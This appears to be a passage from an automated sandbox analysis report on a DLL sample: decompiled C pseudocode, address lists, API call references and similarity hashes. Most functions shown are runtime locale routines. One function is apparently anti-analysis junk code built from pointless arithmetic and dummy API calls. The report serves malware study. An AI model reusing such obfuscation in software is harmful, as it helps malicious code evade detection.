				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				intOrPtr _t233;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E6E7FC3A0(0, 1, 0x50);
					_v8 = _t234;
					E6E7F9268(0);
					if(_t234 != 0) {
						_t227 = E6E7FC3A0(0, 1, 4);
						_v12 = _t227;
						E6E7F9268(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x6e81e0b8, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E6E7FC3A0(0, 1, 4);
							_v16 = _t232;
							E6E7F9268(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E6E7FE84B(_t210, _t224, _t233, _t234);
								_t238 = _t237 | E6E7FE84B(_t210, _t224, _t233, _t237,  &_v28, 1, _t233, 0x14, _v8 + 0x10,  &_v28);
								_t239 = _t238 | E6E7FE84B(_t210, _t224, _t233, _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14, 1);
								_t240 = _t239 | E6E7FE84B(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18, _t233);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E6E7FE84B(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c, 0x15);
								_t242 = _t241 | E6E7FE84B(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20, _t14);
								_t243 = _t242 | E6E7FE84B(_t210, _t224, _t233, _t242);
								_t244 = _t243 | E6E7FE84B(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28,  &_v28);
								_t245 = _t244 | E6E7FE84B(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29, 1);
								_t246 = _t245 | E6E7FE84B(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a, _t233);
								_t247 = _t246 | E6E7FE84B(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b, 0x51);
								_t248 = _t247 | E6E7FE84B(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t249 = _t248 | E6E7FE84B(_t210, _t224, _t233, _t248);
								_t250 = _t249 | E6E7FE84B(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e,  &_v28);
								_t251 = _t250 | E6E7FE84B(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f, 0);
								_t252 = _t251 | E6E7FE84B(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38, _t233);
								_t253 = _t252 | E6E7FE84B(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c, 0x57);
								_t254 = _t253 | E6E7FE84B(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t233);
								_t255 = _t254 | E6E7FE84B(_t210, _t224, _t233, _t254);
								_t256 = _t255 | E6E7FE84B(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48,  &_v28);
								if((E6E7FE84B(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c, 2) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E6E803B8E(_v8);
								E6E7F9268(_v8);
								E6E7F9268(_v12);
								E6E7F9268(_v16);
								goto L4;
							}
							E6E7F9268(_t234);
							E6E7F9268(_v12);
							L7:
							goto L4;
						}
						E6E7F9268(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x6e81e0b8;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E6E7F9268( *(_t210 + 0x88));
							E6E7F9268( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}

0x6e803c8c
0x6e803c95
0x6e803c9c
0x6e803c9f
0x6e803ca2
0x6e803cab
0x6e803ccd
0x6e803cd1
0x6e803cd4
0x6e803cde
0x6e803cf1
0x6e803cf5
0x6e803cf8
0x6e803d02
0x6e803d14
0x6e803faa
0x6e803fab
0x6e803fad
0x6e803fb5
0x6e803fb9
0x6e803fbe
0x6e803fc9
0x6e803fd5
0x6e803fe1
0x6e803fed
0x6e803ff3
0x6e803ff7
0x6e803ff9
0x6e803ff9
0x00000000
0x6e803ff7
0x6e803d23
0x6e803d27
0x6e803d2a
0x6e803d34
0x6e803d48
0x6e803d4e
0x6e803d63
0x6e803d77
0x6e803d8e
0x6e803da8
0x6e803db0
0x6e803dc2
0x6e803dd9
0x6e803df0
0x6e803e0a
0x6e803e21
0x6e803e38
0x6e803e4f
0x6e803e69
0x6e803e80
0x6e803e97
0x6e803eae
0x6e803ec8
0x6e803edf
0x6e803ef6
0x6e803efe
0x6e803eff
0x6e803f01
0x6e803f0d
0x6e803f27
0x6e803f43
0x6e803f71
0x6e803f84
0x6e803f75
0x6e803f79
0x6e803f8d
0x00000000
0x00000000
0x6e803f8f
0x6e803f91
0x6e803f94
0x6e803f96
0x6e803f99
0x6e803f7f
0x6e803f81
0x6e803f83
0x6e803f83
0x6e803f83
0x6e803f79
0x00000000
0x6e803f89
0x6e803f49
0x6e803f4f
0x6e803f58
0x6e803f61
0x00000000
0x6e803f66
0x6e803d37
0x6e803d40
0x6e803d0a
0x00000000
0x6e803d0a
0x6e803d05
0x00000000
0x6e803d05
0x6e803ce0
0x00000000
0x6e803cb5
0x6e803cb5
0x6e803cb7
0x6e803cba
0x6e803ffb
0x6e803ffb
0x6e804003
0x6e804005
0x6e804005
0x6e80400d
0x6e804012
0x6e804016
0x6e80401e
0x6e804026
0x6e80402c
0x6e804016
0x6e804030
0x6e804035
0x6e80403b
0x00000000
0x6e80403b

APIs

_free.LIBCMT ref: 6E803CD4
_free.LIBCMT ref: 6E803CF8
_free.LIBCMT ref: 6E803D05
_free.LIBCMT ref: 6E803D2A
_free.LIBCMT ref: 6E803D37
_free.LIBCMT ref: 6E803D40
_free.LIBCMT ref: 6E80401E
_free.LIBCMT ref: 6E804026

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84f3cb439a83e509e8350e11ce028a1aacf2ee1d8fcd00801b372ee86c800e72
Instruction ID: 286831fff4c4666d5186f0026eff7cf8d860ada84fc175197d7f623fa360b865
Opcode Fuzzy Hash: 84f3cb439a83e509e8350e11ce028a1aacf2ee1d8fcd00801b372ee86c800e72
Instruction Fuzzy Hash: 17C13EB2944209EFDB60DFE8CD86FDA77BCEB09714F150565FA04FB281D67099418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5ED0, Relevance: 18.3, APIs: 12, Instructions: 290
memoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E6E7D5ED0(void* __ecx, signed int __edx) {
				intOrPtr _v32;
				signed int _v36;
				void* _t12;
				void* _t13;
				signed int _t15;
				signed int _t18;
				signed int _t20;
				int _t25;
				void* _t27;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t39;
				void* _t40;
				short _t44;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t56;
				signed int _t60;
				signed int _t62;
				signed int _t67;
				signed int _t85;
				intOrPtr _t88;
				signed int _t96;
				intOrPtr* _t97;
				signed int _t103;
				void* _t105;
				void* _t106;

				_t83 = __edx;
				_t105 = (_t103 & 0xfffffff8) - 0x24;
				if(__ecx == 0x7d) {
					asm("movss xmm0, [0x6e818578]");
					_t13 = E6E8081CE(_t12);
					asm("cdq");
					asm("adc ecx, 0x0");
					_t15 = E6E807C80(_t13, _t83, _t13 + 9, _t83);
					asm("movsd xmm0, [0x6e818648]");
					_t67 = _t15;
					while(_t67 < 0x27) {
						asm("subsd xmm0, xmm0");
						_t62 = E6E8083AF(_t15);
						_t31 = E6E808500(E6E7D5ED0(_t62, _t83), _t30);
						asm("movaps xmm1, xmm0");
						asm("subsd xmm1, xmm0");
						_t67 = _t62;
						asm("movsd [esp+0x10], xmm1");
						asm("mulsd xmm1, xmm0");
						asm("movsd [esp+0x18], xmm1");
						_t15 = E6E808500(_t31, _t67);
						asm("movsd xmm1, [esp+0x18]");
						asm("addsd xmm1, xmm0");
						asm("movsd xmm0, [esp+0x10]");
						asm("cvttsd2si ecx, xmm1");
					}
					asm("movsd xmm1, [0x6e8185b8]");
					asm("movsd xmm2, [0x6e8185d0]");
					if(_t67 < 0x32) {
						asm("o16 nop [eax+eax]");
						while(1) {
							asm("movaps xmm0, xmm1");
							asm("divsd xmm0, xmm1");
							asm("movaps xmm1, xmm0");
							asm("mulsd xmm2, xmm1");
							asm("movsd [esp+0x20], xmm1");
							asm("movaps xmm0, xmm2");
							asm("movsd [esp+0x28], xmm2");
							asm("addsd xmm0, xmm1");
							asm("movss xmm1, [0x6e8186b8]");
							asm("movss [esp+0x10], xmm1");
							asm("cvttsd2si eax, xmm0");
							asm("movss xmm0, [0x6e8186c0]");
							asm("movss [esp+0xc], xmm0");
							if(_t15 < 0x23) {
								goto L20;
							}
							E6E808500(_t15, 0x4e);
							asm("cvtsd2ss xmm0, xmm0");
							asm("movss [esp+0x18], xmm0");
							do {
								_t25 = GetKBCodePage();
								asm("movss xmm1, [esp+0x10]");
								asm("addss xmm1, [esp+0xc]");
								asm("movaps xmm0, xmm1");
								asm("movss [esp+0xc], xmm1");
								asm("subss xmm0, [esp+0x18]");
								asm("movss [esp+0x10], xmm0");
								_t27 = E6E7D5990(0, E6E8081CE(_t25), 0);
								_t105 = _t105 + 8;
								asm("cdq");
								_t15 = E6E808500(_t27, _t27);
								asm("xorps xmm2, xmm2");
								asm("cvtsd2ss xmm2, xmm0");
								asm("movss xmm0, [esp+0xc]");
								asm("divss xmm0, [esp+0x10]");
								asm("movss [esp+0x18], xmm2");
								asm("divss xmm0, xmm2");
								asm("cvttss2si eax, xmm0");
							} while (_t15 >= 0x23);
							L20:
							if(_t15 <= 0x77) {
								L28:
								goto L28;
							}
							if(_t15 >= 0x1f) {
								asm("movsd xmm0, [0x6e8186e0]");
							} else {
								asm("xorps xmm0, xmm0");
							}
							asm("cvttsd2si eax, xmm0");
							_t67 = _t15;
							if(_t15 > 0x74) {
								_t67 = E6E7D5ED0(0x4b, _t83);
								_t15 = E6E808500(_t23, _t67);
								asm("movss xmm1, [0x6e818578]");
								asm("cvtsd2ss xmm0, xmm0");
								asm("divss xmm1, xmm0");
								asm("cvttss2si ecx, xmm1");
							}
							if(_t67 < 0x32) {
								asm("movsd xmm1, [esp+0x20]");
								asm("movsd xmm2, [esp+0x28]");
								continue;
							}
							goto L29;
						}
					}
					L29:
					if(_t67 == 0x7a) {
						asm("movss xmm0, [0x6e8186ac]");
						asm("movss [esp+0x18], xmm0");
						__imp__GetCurrentProcessorNumber();
						_t60 = 0x58;
						_t88 = 0;
						_t3 = _t60 + 4; // 0x5c
						_t96 = _t3;
						while(1) {
							CreateMenu();
							_t18 = E6E7D5990(_t83, _t96, _t88);
							_t105 = _t105 + 8;
							_v36 = _t18;
							asm("xorps xmm0, xmm0");
							_t20 = _t60 + _t60;
							_t60 = _v36;
							asm("cdq");
							_t83 = _t20 % _t60;
							asm("movlpd [esp+0x10], xmm0");
							_t67 = _t20 / _t60;
							if(_t67 < 4) {
								break;
							}
							_t88 = _v32;
							_t96 = _v36;
						}
						if(_t67 != 0x4f) {
							_t97 = __imp__GetSystemDefaultUILanguage;
							do {
								 *_t97();
								asm("movss xmm0, [esp+0x18]");
								asm("subss xmm0, xmm0");
								asm("cvttss2si ecx, xmm0");
								asm("movss [esp+0x18], xmm0");
							} while (_t67 != 0x4f);
						}
					}
					goto L36;
				} else {
					TlsAlloc();
					_t33 = E6E7D5990(_t83, 9, 0);
					_t106 = _t105 + 8;
					_t34 = E6E808500(_t33, 0x10);
					asm("cvtsd2ss xmm0, xmm0");
					asm("addss xmm0, [0x6e818690]");
					_t35 = E6E8081CE(_t34);
					E6E808500(E6E7D5ED0(0x48, 0), _t36);
					asm("cvtsd2ss xmm0, xmm0");
					asm("cvttss2si ecx, xmm0");
					asm("movss [esp+0x18], xmm0");
					_t39 = E6E808500(E6E7D5ED0(_t36, 0), _t38);
					asm("cvtsd2ss xmm0, xmm0");
					_t85 = 0;
					asm("movss [esp+0x10], xmm0");
					_t40 = E6E808500(_t39, _t35);
					asm("cvtsd2ss xmm0, xmm0");
					asm("subss xmm0, [esp+0x18]");
					asm("addss xmm0, [esp+0x10]");
					asm("cvttss2si eax, xmm0");
					if(_t40 >= 0x26) {
						if(_t40 < 0x47) {
							goto L3;
						} else {
							E6E7D57C0();
							_t79 = _t40;
							_t56 = E6E808500(_t40, _t40);
							asm("movaps xmm1, xmm0");
							asm("mulsd xmm1, [0x6e8185a8]");
							asm("cvttsd2si eax, xmm1");
							_t46 = _t56;
							asm("movd xmm1, eax");
							asm("cvtdq2pd xmm1, xmm1");
							asm("subsd xmm0, xmm1");
						}
					} else {
						GetCommandLineW();
						L3:
						GetTickCount();
						_t79 = E6E7D5ED0(0x2e, _t85);
						E6E808500(_t42, _t42);
						asm("movsd [esp+0x18], xmm0");
						_t44 = GetSystemDefaultLangID();
						asm("movss xmm0, [0x6e8186d8]");
						_t46 = E6E8081CE(_t44);
						asm("movd xmm0, eax");
						asm("cvtdq2pd xmm0, xmm0");
						asm("mulsd xmm0, [esp+0x18]");
					}
					asm("movsd xmm1, [0x6e818640]");
					asm("cvttsd2si eax, xmm0");
					asm("movsd [esp+0x18], xmm1");
					if(_t46 == 0x1c) {
						if(_t46 < 7) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						do {
							GetThreadLocale();
							asm("movsd xmm0, [esp+0x18]");
							asm("mulsd xmm0, xmm0");
							asm("cvtpd2ps xmm0, xmm0");
							asm("cvttss2si ecx, xmm0");
							asm("movss [esp+0x10], xmm0");
							_t52 = E6E7D5ED0(_t79, _t85);
							asm("movss xmm0, [esp+0x10]");
							_t54 = E6E7D5990(_t85, E6E8081CE(_t52), _t85);
							_t106 = _t106 + 8;
							asm("movd xmm0, ecx");
							_t79 = _t52;
							asm("cvtdq2pd xmm0, xmm0");
							asm("movsd [esp+0x18], xmm0");
							_t55 = E6E808500(_t54, _t52);
							asm("cvtsd2ss xmm0, xmm0");
							asm("addss xmm0, [esp+0x10]");
							asm("cvtss2sd xmm0, xmm0");
							asm("addsd xmm0, [esp+0x18]");
							asm("cvttsd2si eax, xmm0");
						} while (_t55 != 0x1c);
						L11:
						GetCurrentThread();
						_t67 = E6E7D5990(_t85, 0x4b, 0);
						if(_t67 == 0x65) {
							L36:
							asm("cdq");
							return _t67;
						} else {
							L12:
							CreateMenu();
							asm("cdq");
							return 0xe;
						}
					}
				}
			}

0x6e7d5ed0
0x6e7d5ed6
0x6e7d5edf
0x6e7d60b1
0x6e7d60b9
0x6e7d60c1
0x6e7d60c9
0x6e7d60d0
0x6e7d60d5
0x6e7d60dd
0x6e7d60e2
0x6e7d60e4
0x6e7d60ed
0x6e7d60fa
0x6e7d60ff
0x6e7d6104
0x6e7d6108
0x6e7d610a
0x6e7d6110
0x6e7d6114
0x6e7d611a
0x6e7d611f
0x6e7d6125
0x6e7d6129
0x6e7d612f
0x6e7d6133
0x6e7d6138
0x6e7d6140
0x6e7d614b
0x6e7d6157
0x6e7d6160
0x6e7d6160
0x6e7d6163
0x6e7d6167
0x6e7d616a
0x6e7d616e
0x6e7d6174
0x6e7d6177
0x6e7d617d
0x6e7d6181
0x6e7d6189
0x6e7d618f
0x6e7d6193
0x6e7d619b
0x6e7d61a3
0x00000000
0x00000000
0x6e7d61aa
0x6e7d61af
0x6e7d61b3
0x6e7d61c0
0x6e7d61c0
0x6e7d61c2
0x6e7d61c8
0x6e7d61ce
0x6e7d61d1
0x6e7d61d7
0x6e7d61dd
0x6e7d61ea
0x6e7d61f2
0x6e7d61f5
0x6e7d61f8
0x6e7d61fd
0x6e7d6200
0x6e7d6204
0x6e7d620a
0x6e7d6210
0x6e7d6216
0x6e7d621a
0x6e7d621e
0x6e7d6222
0x6e7d6224
0x6e7d6280
0x00000000
0x6e7d6280
0x6e7d6228
0x6e7d622f
0x6e7d622a
0x6e7d622a
0x6e7d622a
0x6e7d6237
0x6e7d623b
0x6e7d623f
0x6e7d6248
0x6e7d624a
0x6e7d624f
0x6e7d6257
0x6e7d625b
0x6e7d625f
0x6e7d625f
0x6e7d6266
0x6e7d6268
0x6e7d626e
0x00000000
0x6e7d626e
0x00000000
0x6e7d6266
0x6e7d6160
0x6e7d6282
0x6e7d6285
0x6e7d628b
0x6e7d6293
0x6e7d6299
0x6e7d629f
0x6e7d62a4
0x6e7d62a6
0x6e7d62a6
0x6e7d62b0
0x6e7d62b0
0x6e7d62ba
0x6e7d62c2
0x6e7d62c5
0x6e7d62c9
0x6e7d62cc
0x6e7d62cf
0x6e7d62d3
0x6e7d62d4
0x6e7d62d6
0x6e7d62dc
0x6e7d62e1
0x00000000
0x00000000
0x6e7d62e3
0x6e7d62e7
0x6e7d62e7
0x6e7d62f0
0x6e7d62f2
0x6e7d62f8
0x6e7d62f8
0x6e7d62fa
0x6e7d6300
0x6e7d6304
0x6e7d6308
0x6e7d630e
0x6e7d62f8
0x6e7d62f0
0x00000000
0x6e7d5ee5
0x6e7d5ee5
0x6e7d5eef
0x6e7d5ef6
0x6e7d5efc
0x6e7d5f01
0x6e7d5f05
0x6e7d5f0d
0x6e7d5f1f
0x6e7d5f24
0x6e7d5f28
0x6e7d5f2c
0x6e7d5f39
0x6e7d5f3e
0x6e7d5f42
0x6e7d5f46
0x6e7d5f4c
0x6e7d5f51
0x6e7d5f55
0x6e7d5f5b
0x6e7d5f61
0x6e7d5f67
0x6e7d6043
0x00000000
0x6e7d6049
0x6e7d604e
0x6e7d6053
0x6e7d6055
0x6e7d605a
0x6e7d605d
0x6e7d6065
0x6e7d6069
0x6e7d606c
0x6e7d6070
0x6e7d6074
0x6e7d6074
0x6e7d5f6d
0x6e7d5f6d
0x6e7d5f73
0x6e7d5f73
0x6e7d5f80
0x6e7d5f82
0x6e7d5f87
0x6e7d5f8d
0x6e7d5f93
0x6e7d5fa0
0x6e7d5fa3
0x6e7d5fa7
0x6e7d5fab
0x6e7d5fab
0x6e7d5fb1
0x6e7d5fb9
0x6e7d5fbd
0x6e7d5fc5
0x6e7d607f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d5fcb
0x6e7d5fd1
0x6e7d5fd1
0x6e7d5fd3
0x6e7d5fd9
0x6e7d5fdd
0x6e7d5fe1
0x6e7d5fe5
0x6e7d5feb
0x6e7d5ff0
0x6e7d6001
0x6e7d6009
0x6e7d600e
0x6e7d6012
0x6e7d6014
0x6e7d6018
0x6e7d601e
0x6e7d6023
0x6e7d6027
0x6e7d602d
0x6e7d6031
0x6e7d6037
0x6e7d603b
0x6e7d6081
0x6e7d6081
0x6e7d6090
0x6e7d6098
0x6e7d6313
0x6e7d6318
0x6e7d631d
0x6e7d609e
0x6e7d609e
0x6e7d609e
0x6e7d60a9
0x6e7d60b0
0x6e7d60b0
0x6e7d6098
0x6e7d5fc5

APIs

TlsAlloc.KERNEL32(00000030,?,00000000,?,?,?,?,?,?,?,?,6E7D7FC9,00002710,00000000), ref: 6E7D5EE5

Part of subcall function 6E7D5990: GetCurrentThread.KERNEL32 ref: 6E7D5A26
Part of subcall function 6E7D5990: GetCurrentThreadId.KERNEL32 ref: 6E7D5A53
Part of subcall function 6E7D5990: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E7D5A64
Part of subcall function 6E7D5990: TlsAlloc.KERNEL32(00000066,?,00000000), ref: 6E7D5A7A
Part of subcall function 6E7D5990: GetCommandLineW.KERNEL32(0000005C,00000058,?,?,?,?,?,?,?,?,?,?,6E7D62BF,0000005C,00000000), ref: 6E7D5B02
Part of subcall function 6E7D5990: GetTickCount.KERNEL32 ref: 6E7D5B08

Part of subcall function 6E7D5ED0: GetCommandLineW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,6E7D7FC9,00002710,00000000), ref: 6E7D5F6D
Part of subcall function 6E7D5ED0: GetTickCount.KERNEL32 ref: 6E7D5F73
Part of subcall function 6E7D5ED0: GetSystemDefaultLangID.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,6E7D7FC9,00002710,00000000), ref: 6E7D5F8D
Part of subcall function 6E7D5ED0: GetThreadLocale.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,6E7D7FC9,00002710,00000000), ref: 6E7D5FD1
Part of subcall function 6E7D5ED0: GetCurrentThread.KERNEL32 ref: 6E7D6081
Part of subcall function 6E7D5ED0: CreateMenu.USER32(?,00000000,?,?,?,?,?,?,?,?,6E7D7FC9,00002710,00000000), ref: 6E7D609E

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E7D60D0
GetKBCodePage.USER32(00000000,?,-00000009,?,00000030,?,00000000,?,?,?,?,?,?,?,?,6E7D7FC9), ref: 6E7D61C0

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Current$AllocCommandCountLineTickUnothrow_t@std@@@__ehfuncinfo$??2@$CodeCreateDefaultLangLocaleMenuPageSystem
String ID:
API String ID: 1206515349-0
Opcode ID: ed43db878ee37f3658c5d1c945ff55ed56041cbff298d5ba8890c798c2f1cd3f
Instruction ID: 98f552c38b42ce7757be71f1e5f631610c517cf5bbff642133f93c1ff24ffd35
Opcode Fuzzy Hash: ed43db878ee37f3658c5d1c945ff55ed56041cbff298d5ba8890c798c2f1cd3f
Instruction Fuzzy Hash: 6DA10A30D14F098FC302DFB5995529FF3A9AFDB384F148F2AF445B6061EB2455D98A81

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D53C0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6E7D53C0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, char _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed char** _v28;
				char _v72;
				intOrPtr* _v80;
				signed int _t38;
				intOrPtr _t46;
				intOrPtr* _t53;
				char _t56;
				char _t58;
				signed int _t62;
				char _t63;
				intOrPtr _t65;
				void* _t69;
				void* _t72;
				void* _t74;
				signed char** _t75;
				void* _t81;
				intOrPtr _t82;
				intOrPtr* _t84;
				void* _t86;
				void* _t87;
				intOrPtr _t88;
				signed char** _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				char* _t95;
				void* _t100;
				intOrPtr _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_push(0xffffffff);
				_push(E6E808A80);
				_push( *[fs:0x0]);
				_t101 = _t100 - 0x38;
				_push(__ebx);
				_t38 =  *0x6e81e008; // 0x77dcee0d
				_push(_t38 ^ _t98);
				 *[fs:0x0] =  &_v16;
				_v20 = _t101;
				_t65 = __ecx;
				_v24 = __ecx;
				_t92 = E6E7EE636(__ecx, _t81);
				_v28 = _t92;
				E6E7E5A15(__ecx, _t81, _t104,  &_v72);
				 *((intOrPtr*)(_t65 + 8)) = 0;
				 *((intOrPtr*)(_t65 + 0x10)) = 0;
				 *((intOrPtr*)(_t65 + 0x14)) = 0;
				_v8 = 0;
				E6E7E5A15(_t65, _t81, _t104,  &_v72);
				_t102 = _t101 + 8;
				if(_a8 == 0) {
					_t93 =  *((intOrPtr*)(_t92 + 8));
				} else {
					_t93 = 0x6e8178ce;
				}
				_t84 = _t93;
				_t13 = _t84 + 1; // 0x6e8178cf
				_t69 = _t13;
				do {
					_t46 =  *_t84;
					_t84 = _t84 + 1;
				} while (_t46 != 0);
				_t86 = _t84 - _t69 + 1;
				_push(1);
				_push(_t86);
				_t82 = E6E7EE660(_t69);
				_t103 = _t102 + 8;
				if(_t82 == 0) {
					E6E7E4F9C(_t82, __eflags);
					goto L19;
				} else {
					if(_t86 != 0) {
						_t69 = _t82 - _t93;
						do {
							_t63 =  *_t93;
							_t14 = _t93 + 1; // 0x6b6e5500
							_t93 = _t14;
							 *((char*)(_t69 + _t93 - 1)) = _t63;
							_t86 = _t86 - 1;
						} while (_t86 != 0);
					}
					_t87 = 6;
					 *((intOrPtr*)(_t65 + 8)) = _t82;
					_push(1);
					_push(6);
					_t94 = "false";
					_t82 = E6E7EE660(_t69);
					_t103 = _t103 + 8;
					if(_t82 == 0) {
						L19:
						E6E7E4F9C(_t82, __eflags);
						goto L20;
					} else {
						_t72 = _t82 - _t94;
						do {
							_t56 =  *_t94;
							_t94 = _t94 + 1;
							 *((char*)(_t72 + _t94 - 1)) = _t56;
							_t87 = _t87 - 1;
						} while (_t87 != 0);
						_t88 = 5;
						 *((intOrPtr*)(_t65 + 0x10)) = _t82;
						_push(1);
						_push(5);
						_t95 = "true";
						_t82 = E6E7EE660(_t72);
						_t103 = _t103 + 8;
						if(_t82 == 0) {
							L20:
							E6E7E4F9C(_t82, __eflags);
							E6E7D4280(_v24);
							E6E7E8B67(0, 0);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t53 = _v80;
							 *_t53 = 0x6e80afe4;
							 *((intOrPtr*)(_t53 + 4)) = 5;
							return 1;
						} else {
							_t74 = _t82 - _t95;
							do {
								_t58 =  *_t95;
								_t95 =  &(_t95[1]);
								 *((char*)(_t74 + _t95 - 1)) = _t58;
								_t88 = _t88 - 1;
							} while (_t88 != 0);
							 *((intOrPtr*)(_t65 + 0x14)) = _t82;
							if(_a8 == 0) {
								_t75 = _v28;
								 *((char*)(_t65 + 0xc)) =  *( *_t75) & 0x000000ff;
								_t62 =  *(_t75[1]) & 0x000000ff;
								 *(_t65 + 0xd) = _t62;
								 *[fs:0x0] = _v16;
								return _t62;
							} else {
								 *((short*)(_t65 + 0xc)) = 0x2c2e;
								 *[fs:0x0] = _v16;
								return _t58;
							}
						}
					}
				}
			}

0x6e7d53c3
0x6e7d53c5
0x6e7d53d0
0x6e7d53d1
0x6e7d53d4
0x6e7d53d7
0x6e7d53de
0x6e7d53e2
0x6e7d53e8
0x6e7d53eb
0x6e7d53ed
0x6e7d53f5
0x6e7d53fb
0x6e7d53fe
0x6e7d5406
0x6e7d540e
0x6e7d5415
0x6e7d541c
0x6e7d5423
0x6e7d5428
0x6e7d542f
0x6e7d5438
0x6e7d5431
0x6e7d5431
0x6e7d5431
0x6e7d543b
0x6e7d543d
0x6e7d543d
0x6e7d5440
0x6e7d5440
0x6e7d5442
0x6e7d5443
0x6e7d5449
0x6e7d544a
0x6e7d544c
0x6e7d5452
0x6e7d5454
